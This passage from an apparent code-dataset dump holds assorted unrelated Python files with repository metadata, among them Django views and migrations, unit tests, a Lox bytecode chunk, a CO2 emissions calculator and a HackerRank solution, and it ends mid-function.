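The hand-rolled `sys.argv` scan above can also be written with `argparse`, which handles a missing `-t` flag explicitly instead of relying on an exception. A hypothetical stdlib sketch of the same behavior (the `build_path` function name is invented for illustration):

```python
import argparse
import os
from datetime import datetime

def build_path(argv):
    """Like the script above: a timestamped note name, optionally under a topic dir."""
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', dest='topic', default=None, help='topic directory')
    args = parser.parse_args(argv)
    name = datetime.utcnow().strftime("%Y%m%d-%H%M%S.md")
    # With no -t flag, the note lands in the current directory
    return os.path.join(args.topic, name) if args.topic else name

path = build_path(['-t', 'notes'])  # e.g. "notes/20240101-120000.md"
```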
94a725b80964b0d1c363be556587576cc1338bfd | 875 | py | Python | tests/hopfieldnettests/net/network_creation.py | pmatigakis/hopfieldnet | MIT | 28 stars, 13 forks
import unittest
import numpy as np
from hopfieldnet.net import HopfieldNetwork, InvalidWeightsException
class HopfieldNetworkCreationTests(unittest.TestCase):
    def setUp(self):
        self.net = HopfieldNetwork(10)

    def test_change_network_weights(self):
        new_weights = np.ones((10, 10))
        self.net.set_weights(new_weights)
        self.assertTrue(np.array_equal(self.net.get_weights(), new_weights),
                        "The network weights have not been updated")

    def test_fail_to_change_weights_when_shape_not_same_as_input_vector(self):
        new_weights = np.ones((5, 5))
        self.assertRaises(InvalidWeightsException, self.net.set_weights, new_weights)

    def test_network_creation(self):
        self.assertEqual(self.net.get_weights().shape, (10, 10),
                         "The network's weight array has the wrong shape")


if __name__ == "__main__":
    unittest.main()
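For context on why these weight matrices are square `(N, N)`: a Hopfield network keeps one weight per neuron pair, and Hebbian training yields a symmetric matrix with a zero diagonal. A dependency-free sketch of that rule (the actual `hopfieldnet` training API may differ):

```python
def hebbian_weights(patterns, n):
    """Hebbian rule: w[i][j] = sum over patterns of p[i] * p[j], zero diagonal."""
    w = [[0.0] * n for _ in range(n)]
    for p in patterns:
        for i in range(n):
            for j in range(n):
                if i != j:  # no self-connections in a Hopfield network
                    w[i][j] += p[i] * p[j]
    return w

w = hebbian_weights([[1, -1, 1, -1]], n=4)
# symmetric with zero diagonal, e.g. w[0][2] == w[2][0] == 1
```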
94a7f32aeb3e4b7407a1b59b692d58dd7cc09416 | 1,737 | py | Python | river_admin/views/function_view.py | pantyukhov/river-admin | BSD-3-Clause | 75 stars, 21 issues, 19 forks
from rest_framework.generics import get_object_or_404
from rest_framework.response import Response
from rest_framework.status import HTTP_400_BAD_REQUEST, HTTP_200_OK
from river.models import Function
from river_admin.views import get, post, put, delete
from river_admin.views.serializers import UpdateFunctionDto, CreateFunctionDto, FunctionDto
@get(r'^function/get/(?P<pk>\w+)/$')
def get_it(request, pk):
    function = get_object_or_404(Function.objects.all(), pk=pk)
    return Response(FunctionDto(function).data, status=HTTP_200_OK)


@get(r'^function/list/$')
def list_it(request):
    return Response(FunctionDto(Function.objects.all(), many=True).data, status=HTTP_200_OK)


@post(r'^function/create/')
def create_it(request):
    create_function_request = CreateFunctionDto(data=request.data)
    if create_function_request.is_valid():
        function = create_function_request.save()
        return Response({"id": function.id}, status=HTTP_200_OK)
    else:
        return Response(create_function_request.errors, status=HTTP_400_BAD_REQUEST)


@put(r'^function/update/(?P<pk>\w+)/$')
def update_it(request, pk):
    function = get_object_or_404(Function.objects.all(), pk=pk)
    update_function_request = UpdateFunctionDto(data=request.data, instance=function)
    if update_function_request.is_valid():
        update_function_request.save()
        return Response({"message": "Function is updated"}, status=HTTP_200_OK)
    else:
        return Response(update_function_request.errors, status=HTTP_400_BAD_REQUEST)


@delete(r'^function/delete/(?P<pk>\w+)/$')
def delete_it(request, pk):
    function = get_object_or_404(Function.objects.all(), pk=pk)
    function.delete()
    return Response(status=HTTP_200_OK)
94b185ec7b26237c15a8147e0cf8e33a0273856f | 2,080 | py | Python | roadmap/migrations/0001_initial.py | bitmazk/django-roadmap | MIT | 2 stars, 3 issues, 1 fork
# flake8: noqa
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):

    def forwards(self, orm):
        # Adding model 'Milestone'
        db.create_table('roadmap_milestone', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('start_date', self.gf('django.db.models.fields.DateField')()),
        ))
        db.send_create_signal('roadmap', ['Milestone'])

        # Adding model 'MilestoneTranslation'
        db.create_table('roadmap_milestonetranslation', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('milestone', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['roadmap.Milestone'])),
            ('name', self.gf('django.db.models.fields.CharField')(max_length=1024)),
            ('language', self.gf('django.db.models.fields.CharField')(max_length=5)),
        ))
        db.send_create_signal('roadmap', ['MilestoneTranslation'])

    def backwards(self, orm):
        # Deleting model 'Milestone'
        db.delete_table('roadmap_milestone')

        # Deleting model 'MilestoneTranslation'
        db.delete_table('roadmap_milestonetranslation')

    models = {
        'roadmap.milestone': {
            'Meta': {'object_name': 'Milestone'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'start_date': ('django.db.models.fields.DateField', [], {})
        },
        'roadmap.milestonetranslation': {
            'Meta': {'object_name': 'MilestoneTranslation'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
            'milestone': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['roadmap.Milestone']"}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
        }
    }

    complete_apps = ['roadmap']
94b5e68f3e111b96fca699f4d5fd4ef4b76998fd | 6,284 | py | Python | cappylib/general.py | ChrisPappalardo/cappylib | e7f469e51bac5d35444514f5504728cc81c1d678 | [
"MIT"
] | 1 | 2016-05-29T17:22:30.000Z | 2016-05-29T17:22:30.000Z | cappylib/general.py | ChrisPappalardo/cappylib | e7f469e51bac5d35444514f5504728cc81c1d678 | [
"MIT"
] | null | null | null | cappylib/general.py | ChrisPappalardo/cappylib | e7f469e51bac5d35444514f5504728cc81c1d678 | [
"MIT"
] | null | null | null | ##############################################################################################
# HEADER
#
# cappylib/general.py - defines useful functions for python scripts
#
# Copyright (C) 2008-2013 Chris Pappalardo <cpappala@yahoo.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
# to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
##############################################################################################

##############################################################################################
# IMPORTS
##############################################################################################

import sys, re, ast

##############################################################################################
# GLOBAL VARS
##############################################################################################

##############################################################################################
# MAIN CODE
##############################################################################################


# enumerations class
class enum:

    # days of the week
    class weekdays:
        MONDAY = 0
        TUESDAY = 1
        WEDNESDAY = 2
        THURSDAY = 3
        FRIDAY = 4
        SATURDAY = 5
        SUNDAY = 6


# error class - extends base exception class with a string
class error(Exception):
    """extends Exception class with additional information and message listing"""

    def __init__(self, location, eType, *messages):
        m = '%s: %s %s' % (location, eType, ' '.join(messages))
        self.error = m  # for backwards compatibility
        super(error, self).__init__(m)


# aColor - returns ANSI codes for a given set of formats
def aColor(codeString):
    """returns ANSI encoded string for a given set of ; separated format codes"""

    # define ANSI codes
    ansiCodeMask = '\033[{0}m'
    ansiColorCodes = {
        'OFF': 0,
        'BOLD': 1,
        'ITALIC': 3,
        'UNDERLINE': 4,
        'BLINK': 5,
        'BLACK': 30,
        'RED': 31,
        'GREEN': 32,
        'YELLOW': 33,
        'BLUE': 34,
        'MAGENTA': 35,
        'CYAN': 36,
        'WHITE': 37,
        'B': 10,  # background code offset
        'I': 60,  # intensity code offset
    }

    # create ANSI encoded string from format codeString
    offset = 0
    codes = []
    for c in codeString.split(';'):
        if c in ('B', 'I'):
            offset += ansiColorCodes[c]
        else:
            codes.append(offset + ansiColorCodes[c])
            offset = 0

    # return ANSI string
    return ''.join([ansiCodeMask.format(c) for c in codes])


# argParse - map CLI args to a keyMap and optionally parse for a key/value
def argParse(keyMap=None, keySearch=None, valueSearch=None):
    """map CLI args to a keyMap and optionally parse for a key/value"""

    args = sys.argv[1:] if len(sys.argv) > 1 else []
    keyMap = keyMap if keyMap else []

    # step through a copy of args and extract any --<var>='<value>' elements
    keyValuePairs = {}
    for arg in list(args):
        r = re.search('--(.+?)=[\'"]{0,1}(.*)[\'"]{0,1}', arg, (re.MULTILINE | re.DOTALL))
        if r:
            args.remove(arg)
            keyValuePairs[r.group(1)] = r.group(2)

    # if --ast_eval=True was passed, call ast eval on each value in keyValuePairs
    if 'ast_eval' in keyValuePairs and keyValuePairs['ast_eval']:
        keyValuePairs = dict([(key, ast.literal_eval(keyValuePairs[key]))
                              for key in keyValuePairs.keys()])

    # map keyMap to args, adding filename
    mappedArgs = dict(zip(['__file'] + keyMap, [sys.argv[0]] + args))

    # merge key mapped dict with key value pairs dict (Python 2 dict merge)
    mappedArgs = dict(mappedArgs.items() + keyValuePairs.items())

    # ensure all keyMap keys have a value
    for key in keyMap:
        if key not in mappedArgs:
            mappedArgs[key] = None

    # if valueSearch, return true if value in args|mappedArgs, else false
    if valueSearch:
        found = valueSearch in args or valueSearch in mappedArgs.values()
        return True if found else False

    # if keySearch, return value if key is defined, else false
    if keySearch:
        return mappedArgs[keySearch] if keySearch in mappedArgs else False

    # if a keyMap or keyValuePairs were passed, return mappedArgs, else args
    return mappedArgs if (keyMap or keyValuePairs) and mappedArgs else args


##############################################################################################
# TESTING
##############################################################################################

# NOTE: this module is Python 2 (print statements, dict.items() concatenation)
def main():

    # argParse test
    print 'argParse()... ', argParse()
    print 'argParse(keyMap=[one, two, three])... ', argParse(keyMap=['one', 'two', 'three'])
    print 'argParse(keyMap=[one, two, three],keySearch=one)... ', \
        argParse(keyMap=["one", "two", "three"], keySearch='one')
    print 'argParse(valueSearch="2")... ', argParse(valueSearch='2')

    # error test
    try:
        raise error('test', 'error', 'fi', 'fo', 'fum')
    except error as e:
        print 'error... ', e.error

    # color test
    print 'aColor... ' + aColor('BOLD;B;I;GREEN') + '1' + aColor('OFF')


if __name__ == '__main__':
    try:
        main()
    except error as e:
        print e.error
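The offset trick in `aColor` (where `B` and `I` accumulate until the next concrete color code) can be exercised in isolation. This is a Python 3 sketch of the same logic, not part of cappylib, with a reduced code table for brevity:

```python
# Reduced ANSI table; 'B' and 'I' are offsets, the rest are concrete codes.
ANSI = {'OFF': 0, 'BOLD': 1, 'GREEN': 32, 'B': 10, 'I': 60}


def a_color(code_string):
    # 'B' and 'I' accumulate as an offset applied to the next concrete code,
    # so 'B;I;GREEN' yields 10 + 60 + 32 = 102 (bright green background).
    offset, codes = 0, []
    for c in code_string.split(';'):
        if c in ('B', 'I'):
            offset += ANSI[c]
        else:
            codes.append(offset + ANSI[c])
            offset = 0
    return ''.join('\033[{0}m'.format(c) for c in codes)


print(repr(a_color('BOLD;B;I;GREEN')))  # → '\x1b[1m\x1b[102m'
```

This mirrors what the module's own `main()` test prints: bold text on a bright green background, followed by a reset.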

# ---- core/views.py (UmerSE/django-login, Apache-2.0) ----
from django.shortcuts import render, redirect
from core import models
from django.contrib import messages
from django.core.mail import send_mail
from app import settings
# from django.contrib.sites.shortcuts import get_current_site
# from django.template.loader import render_to_string
# from django.utils.http import urlsafe_base64_decode, urlsafe_base64_encode
from django.utils.http import urlsafe_base64_decode
# from django.utils.encoding import force_bytes, force_text
from django.utils.encoding import force_text
from django.contrib.auth import authenticate, login, logout
from core.utils import generate_token
from django.views import generic


# Create your views here.
class HomeView(generic.TemplateView):
    template_name = "authentication/index.html"


def signup(request):
    if request.method == "POST":
        username = request.POST['username']
        fname = request.POST['fname']
        lname = request.POST['lname']
        email = request.POST['email']
        pass1 = request.POST['pass1']
        pass2 = request.POST['pass2']

        if models.User.objects.filter(username=username):
            messages.error(request, "Username already exists! Please try some other username.")
            return redirect('home')

        if models.User.objects.filter(email=email).exists():
            messages.error(request, "Email Already Registered!!")
            return redirect('home')

        if len(username) > 20:
            messages.error(request, "Username must be under 20 characters!!")
            return redirect('home')

        if pass1 != pass2:
            messages.error(request, "Passwords didn't match!!")
            return redirect('home')

        if not username.isalnum():
            messages.error(request, "Username must be Alpha-Numeric!!")
            return redirect('home')

        myuser = models.User(first_name=fname, last_name=lname, username=username, email=email)
        myuser.set_password(pass1)
        myuser.save()
        messages.success(request, "Your Account has been created successfully!! Please check your email to confirm your email address in order to activate your account.")

        # Welcome Email
        subject = "Welcome to Login!!"
        message = "Hello " + myuser.first_name + "!!\nWelcome to login!! We have also sent you a confirmation email, please confirm your email address.\n\n"
        from_email = settings.EMAIL_HOST_USER
        to_list = [myuser.email]
        send_mail(subject, message, from_email, to_list, fail_silently=False)

        # Email Address Confirmation Email
        # current_site = get_current_site(request)
        # email_subject = "Confirm your Email @ Login!!"
        # message2 = render_to_string('email_confirmation.html', {
        #     'name': myuser.first_name,
        #     'domain': current_site.domain,
        #     'uid': urlsafe_base64_encode(force_bytes(myuser.pk)),
        #     'token': generate_token.make_token(myuser)
        # })
        # email.send()

        return redirect('signin')

    return render(request, "authentication/signup.html")


def activate(request, uidb64, token):
    try:
        uid = force_text(urlsafe_base64_decode(uidb64))
        myuser = models.User.objects.get(pk=uid)
    except (TypeError, ValueError, OverflowError, models.User.DoesNotExist):
        myuser = None

    if myuser is not None and generate_token.check_token(myuser, token):
        myuser.is_active = True
        # user.profile.signup_confirmation = True
        myuser.save()
        login(request, myuser)
        messages.success(request, "Your Account has been activated!!")
        return redirect('signin')
    else:
        return render(request, 'activation_failed.html')


def signin(request):
    if request.method == 'POST':
        username = request.POST['username']
        pass1 = request.POST['pass1']

        user = authenticate(username=username, password=pass1)

        if user is not None:
            login(request, user)
            fname = user.first_name
            # messages.success(request, "Logged In Successfully!!")
            return render(request, "authentication/index.html", {"fname": fname})
        else:
            messages.error(request, "Bad Credentials!!")
            return redirect('home')

    return render(request, "authentication/signin.html")


def signout(request):
    logout(request)
    messages.success(request, "Logged Out Successfully!!")
    return redirect('home')
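The `uidb64` round-trip that `activate()` depends on (encode the user's primary key into the email link, decode it back in the view) can be seen in isolation. This is a standalone sketch using the stdlib; Django's `urlsafe_base64_encode`/`urlsafe_base64_decode` behave equivalently (URL-safe base64 with padding stripped), but are not importable here:

```python
import base64


def urlsafe_b64encode_nopad(data: bytes) -> str:
    # what urlsafe_base64_encode(force_bytes(pk)) produces for the email link
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def urlsafe_b64decode_pad(s: str) -> bytes:
    # what urlsafe_base64_decode does inside activate(); re-adds padding
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


uidb64 = urlsafe_b64encode_nopad(str(42).encode())  # pk 42, as embedded in the URL
assert urlsafe_b64decode_pad(uidb64) == b"42"       # pk recovered by activate()
print(uidb64)  # → NDI
```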

# ---- events/eventsapi/migrations/0002_eventdetails_eventgallery_userdetails.py (Akshat1903/Events-Portal-Backend, MIT) ----
# Generated by Django 3.0.8 on 2021-02-20 13:51
import ckeditor.fields
from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    dependencies = [
        ('eventsapi', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='UserDetails',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
            ],
        ),
        migrations.CreateModel(
            name='EventGallery',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('gallery_image', models.TextField()),
                ('event', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='event_gallery', to='eventsapi.Event')),
            ],
        ),
        migrations.CreateModel(
            name='EventDetails',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('event_date', models.DateField()),
                ('description', ckeditor.fields.RichTextField(blank=True, null=True)),
                ('main_image', models.TextField()),
                ('banner_image', models.TextField()),
                ('event', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='event_description', to='eventsapi.Event')),
            ],
        ),
    ]

# ---- books/crafting_interpreters/pylox/lox/chunk.py (thundergolfer/uni, MIT) ----
import dataclasses
import enum

import value


@enum.unique
class OpCode(enum.IntEnum):
    OP_CONSTANT = enum.auto()
    OP_RETURN = enum.auto()


@dataclasses.dataclass(frozen=False)
class Chunk:
    code: bytearray
    constants: list[value.Value]


def init_chunk() -> Chunk:
    return Chunk(
        code=bytearray(),
        constants=[],
    )


def write_chunk(chunk: Chunk, byte_: int) -> None:
    # NOTE: the original guard `0 > byte_ > 255` could never be true; a value
    # is out of byte range when it is below 0 OR above 255.
    if not 0 <= byte_ <= 255:
        raise ValueError(f"{byte_=} must be in the range [0-255].")
    chunk.code.append(byte_)


def add_constant(chunk: Chunk, val: value.Value) -> int:
    chunk.constants.append(val)
    return len(chunk.constants) - 1
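A quick, self-contained usage sketch of this chunk API, in the clox style the book describes (with `value.Value` stood in by a plain Python `float`, since the pylox `value` module is not shown here). Note that `enum.auto()` on an `IntEnum` starts at 1, so `OP_CONSTANT == 1` and `OP_RETURN == 2`:

```python
import dataclasses
import enum


@enum.unique
class OpCode(enum.IntEnum):
    OP_CONSTANT = enum.auto()  # == 1
    OP_RETURN = enum.auto()    # == 2


@dataclasses.dataclass
class Chunk:
    code: bytearray
    constants: list  # constant pool; floats stand in for value.Value here


def init_chunk() -> Chunk:
    return Chunk(code=bytearray(), constants=[])


def write_chunk(chunk: Chunk, byte_: int) -> None:
    if not 0 <= byte_ <= 255:  # one byte only
        raise ValueError(f"{byte_=} must be in the range [0-255].")
    chunk.code.append(byte_)


def add_constant(chunk: Chunk, val: float) -> int:
    chunk.constants.append(val)
    return len(chunk.constants) - 1


# Emit "load constant 1.2, then return":
chunk = init_chunk()
idx = add_constant(chunk, 1.2)          # idx == 0: first slot in the pool
write_chunk(chunk, OpCode.OP_CONSTANT)  # opcode byte
write_chunk(chunk, idx)                 # operand: constant-pool index
write_chunk(chunk, OpCode.OP_RETURN)
print(list(chunk.code), chunk.constants)  # → [1, 0, 2] [1.2]
```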

# ---- spec/puzzle/steps/generate_solutions_spec.py (PhilHarnish/forge, MIT) ----
import collections
from puzzle.constraints import solution_constraints
from puzzle.steps import generate_solutions
from spec.mamba import *

_SOLUTIONS = collections.OrderedDict((
    ('early_low', 0.1),
    ('early_high', 1.0),
    ('after_early_high', 0.9),
    ('mid_low', 0.2),
    ('late_mid', 0.5),
    ('late_low', 0.3),
    ('late_high', 0.8),
))


def _source() -> generate_solutions.Solutions:
  yield from _SOLUTIONS.items()


with description('generate_solutions') as self:
  with before.each:
    self.constraints = solution_constraints.SolutionConstraints()

  with description('constructor'):
    with it('constructs without error'):
      expect(calling(
          generate_solutions.GenerateSolutions, self.constraints, _source)
      ).not_to(raise_error)

    with it('does not read source until needed'):
      source = mock.Mock(return_value=_source())
      generate_solutions.GenerateSolutions(self.constraints, source)
      expect(source).not_to(have_been_called_once)

  with description('generation'):
    with before.each:
      self.source_iter = _source()
      self.source = mock.Mock(return_value=self.source_iter)
      self.ex = generate_solutions.GenerateSolutions(
          self.constraints, self.source)

    with it('produces solutions'):
      expect(self.ex.solutions()).to(equal(_SOLUTIONS))

    with it('only calls source once'):
      self.ex.solutions()
      self.ex.solutions()
      expect(self.source).to(have_been_called_once)

    with it('constrains solutions'):
      self.constraints.weight_threshold = 1.0
      expect(self.ex.solutions()).to(equal({'early_high': 1.0}))

    with it('only calls source once, even if reconstrained'):
      self.ex.solutions()
      self.constraints.weight_threshold = 0.5
      self.ex.solutions()
      expect(self.source).to(have_been_called_once)

    with it('solutions() returns all results'):
      expect(list(self.ex.solutions().items())).to(equal(
          list(sorted(_SOLUTIONS.items(), key=lambda x: x[1], reverse=True))))

    with it('solutions stream via yield'):
      expect(self.ex.solution).to(equal('early_high'))
      # Prove there are still items left in the iterator:
      expect(calling(next, self.source_iter)).to(equal(
          ('after_early_high', 0.9)))

    with description('event broadcasting'):
      with it('sends an event solutions have changed'):
        on_change_stub = mock.Mock()
        self.ex.subscribe(on_change_stub)
        self.constraints.weight_threshold = 0.5
        expect(on_change_stub.on_next).to(have_been_called_once)

  with description('interrupting iteration'):
    with before.each:
      self.iterations = 0
      self.stop_iterations = 0

      def source_iter() -> generate_solutions.Solutions:
        for k, v in _SOLUTIONS.items():
          while v < self.constraints.weight_threshold:
            self.stop_iterations += 1
            yield StopIteration()
          self.iterations += 1
          yield k, v

      self.source_iter = source_iter()
      self.source = mock.Mock(return_value=self.source_iter)
      self.ex = generate_solutions.GenerateSolutions(self.constraints, self.source)

    with it('still produces solutions'):
      expect(self.ex.solutions()).to(equal(_SOLUTIONS))
      expect(self.iterations).to(equal(len(_SOLUTIONS)))

    with it('stops if constraints require'):
      self.constraints.weight_threshold = 0.5
      self.ex.solutions()
      expect(self.iterations).to(be_below(len(_SOLUTIONS)))
      expect(self.stop_iterations).to(equal(1))

    with it('resumes if constraints change'):
      self.constraints.weight_threshold = 0.5
      self.ex.solutions()
      self.constraints.weight_threshold = 0.0
      self.ex.solutions()
      expect(self.iterations).to(equal(len(_SOLUTIONS)))

# ---- src/nypower/calc.py (hongjsk/ny-power, Apache-2.0) ----
"""Calculators for different values.
In order to approximate the emissions for a single kWh of produced
energy, per power source we look at the following 2016 data sets.
* Detailed EIA-923 emissions survey data
(https://www.eia.gov/electricity/data/state/emission_annual.xls)
* Net Generation by State by Type of Producer by Energy Source
(EIA-906, EIA-920, and EIA-923)
(https://www.eia.gov/electricity/data/state/annual_generation_state.xls)
The NY Numbers for 2016 on power generation are (power in MWh)
2016 NY Total Electric Power Industry Total 134,417,107
2016 NY Total Electric Power Industry Coal 1,770,238
2016 NY Total Electric Power Industry Pumped Storage -470,932
2016 NY Total Electric Power Industry Hydroelectric Conventional 26,888,234
2016 NY Total Electric Power Industry Natural Gas 56,793,336
2016 NY Total Electric Power Industry Nuclear 41,570,990
2016 NY Total Electric Power Industry Other Gases 0
2016 NY Total Electric Power Industry Other 898,989
2016 NY Total Electric Power Industry Petroleum 642,952
2016 NY Total Electric Power Industry Solar Thermal and Photovoltaic 139,611
2016 NY Total Electric Power Industry Other Biomass 1,604,650
2016 NY Total Electric Power Industry Wind 3,940,180
2016 NY Total Electric Power Industry Wood and Wood Derived Fuels 638,859
The NY Numbers on Emissions are (metric tons of CO2, SO2, NOx)
2016 NY Total Electric Power Industry All Sources 31,295,191 18,372 32,161
2016 NY Total Electric Power Industry Coal 2,145,561 10,744 2,635
2016 NY Total Electric Power Industry Natural Gas 26,865,277 122 14,538
2016 NY Total Electric Power Industry Other Biomass 0 1 8,966
2016 NY Total Electric Power Industry Other 1,660,517 960 3,991
2016 NY Total Electric Power Industry Petroleum 623,836 1,688 930
2016 NY Total Electric Power Industry Wood and Wood Derived Fuels 0 4,857 1,101
Dual Fuel systems are interesting: they are designed to burn either
Natural Gas or Petroleum when access to NG is limited by price or
capacity. (Under extreme cold conditions NG supply is prioritized for
heating.)

We then make the following simplifying assumptions (given access to the data):

* All natural gas generation is the same from an emissions perspective.
* The dual fuel systems burned 30% of the total NG in the state, and
  all of the Petroleum. Based on eyeballing the Dual Fuel systems,
  they tend to be running slightly less than straight NG systems.
* The mix of NG / Oil burned in dual fuel plants is constant
  throughout the year. This is clearly not true, but there is no
  better time resolution information available.
* All other fossil fuels means Coal. All Coal is equivalent from an
  emissions perspective.
"""
# PWR in MWh
# CO2 in Metric Tons
#
# TODO(sdague): add in
FUEL_2016 = {
    "Petroleum": {
        "Power": 642952,
        "CO2": 623836
    },
    "Natural Gas": {
        "Power": 56793336,
        "CO2": 26865277
    },
    "Other Fossil Fuels": {
        "Power": 1770238,
        "CO2": 2145561
    }
}

# assume Dual Fuel systems consume 30% of state NG. That's probably low.
FUEL_2016["Dual Fuel"] = {
    "Power": (FUEL_2016["Petroleum"]["Power"] +
              (FUEL_2016["Natural Gas"]["Power"] * .3)),
    "CO2": (FUEL_2016["Petroleum"]["CO2"] +
            (FUEL_2016["Natural Gas"]["CO2"] * .3)),
}


# Calculate CO2 per kWh usage
def co2_for_fuel(fuel):
    """Returns metric tons CO2 per MWh, equivalently kg per kWh."""
    if fuel in FUEL_2016:
        hpow = FUEL_2016[fuel]["Power"]
        hco2 = FUEL_2016[fuel]["CO2"]
        co2per = float(hco2) / float(hpow)
        return co2per
    else:
        return 0.0


def co2_rollup(rows):
    total_kW = 0
    total_co2 = 0
    for row in rows:
        fuel_name = row[2]
        kW = int(float(row[3]))
        total_kW += kW
        total_co2 += kW * co2_for_fuel(fuel_name)
    co2_per_kW = total_co2 / total_kW
    return co2_per_kW
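As a sanity check on the tables in the module docstring, the implied emission factors can be computed directly from the 2016 totals. Since metric tons per MWh equals kg per kWh, no unit conversion is needed:

```python
# 2016 NY totals from the EIA tables above: (MWh generated, metric tons CO2)
fuels = {
    "Natural Gas": (56793336, 26865277),
    "Petroleum": (642952, 623836),
    "Other Fossil Fuels": (1770238, 2145561),  # i.e. Coal
}

for name, (mwh, co2) in fuels.items():
    print(f"{name}: {co2 / mwh:.3f} kg CO2/kWh")
# → roughly 0.473 (gas), 0.970 (oil), 1.212 (coal)
```

The ordering matches intuition: per unit of energy, coal emits roughly two and a half times what natural gas does, which is why the fuel mix matters so much for the real-time intensity estimate.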

# ---- Part2/comment_test.py (BaiMoHan/LearningPython_ING_202002, MIT) ----
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/2/11 14:23
# @Author : Baimohan/PH
# @Site : https://github.com/BaiMoHan
# @File : comment_test.py
# @Software: PyCharm
print("hello world")
# This is a single-line comment
'''
Multi-line comment,
single-quote form
'''
"""
Multi-line comment with double quotes (three double quotes)
"""
print("测试")  # prints "test"
a = 5
print(a)
a += 3
print(a)
| 13.818182 | 40 | 0.588816 | 45 | 304 | 3.955556 | 0.844444 | 0.067416 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056911 | 0.190789 | 304 | 21 | 41 | 14.47619 | 0.666667 | 0.605263 | 0 | 0.333333 | 0 | 0 | 0.175676 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
94d2fa8ed41b130939e6d5ba9082e67b5cb90786 | 885 | py | Python | Python/Itertools/Maximize it/maximize_it.py | brianchiang-tw/HackerRank | 02a30a0033b881206fa15b8d6b4ef99b2dc420c8 | [
"MIT"
] | 2 | 2020-05-28T07:15:00.000Z | 2020-07-21T08:34:06.000Z | Python/Itertools/Maximize it/maximize_it.py | brianchiang-tw/HackerRank | 02a30a0033b881206fa15b8d6b4ef99b2dc420c8 | [
"MIT"
] | null | null | null | Python/Itertools/Maximize it/maximize_it.py | brianchiang-tw/HackerRank | 02a30a0033b881206fa15b8d6b4ef99b2dc420c8 | [
"MIT"
] | null | null | null | # Enter your code here. Read input from STDIN. Print output to STDOUT
from typing import List
from itertools import product
def sum_of_square_mod_m(nums: tuple, mod_m):
    return sum(map(lambda x: x**2, nums)) % mod_m


def maximize_function_value(list_of_list: List, mod_m):
    count_of_list = len(list_of_list)
    all_possible_combination = list(product(*list_of_list))

    max_fn_value = -1
    for one_trial in all_possible_combination:
        # update max function value
        max_fn_value = max(sum_of_square_mod_m(one_trial, mod_m), max_fn_value)

    print(max_fn_value)


if __name__ == '__main__':
    buf = list(map(int, input().split()))
    k, m = buf[0], buf[1]

    list_of_list = []
    for _ in range(k):
        list_of_list.append(list(map(int, input().split()))[1:])

    maximize_function_value(list_of_list, m)

# ---- tests/test_errors.py (zzacharo/flask-resources, MIT) ----
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
#
# Flask-Resources is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.

"""Errors test module."""

import pytest
from flask import Flask

from flask_resources.resources import CollectionResource, Resource, ResourceConfig


# These classes are in the file because they are under test too
class CustomConfig(ResourceConfig):
    """Custom resource configuration."""

    item_route = "/custom/<id>"
    list_route = "/custom/"


class CustomResource(CollectionResource):
    """Custom resource implementation."""

    def __init__(self, *args, **kwargs):
        """Constructor."""
        super(CustomResource, self).__init__(config=CustomConfig, *args, **kwargs)


@pytest.fixture(scope="module")
def app():
    """Application factory fixture."""
    app_ = Flask(__name__)
    custom_bp = CustomResource().as_blueprint("custom_resource")
    app_.register_blueprint(custom_bp)
    return app_


def test_404_if_no_route(client):
    response = client.get("/foo")
    assert response.status_code == 404

    response = client.post("/foo")
    assert response.status_code == 404

    response = client.put("/foo")
    assert response.status_code == 404

    response = client.patch("/foo")
    assert response.status_code == 404

    response = client.delete("/foo")
    assert response.status_code == 404


def test_405_if_route_but_no_method(client):
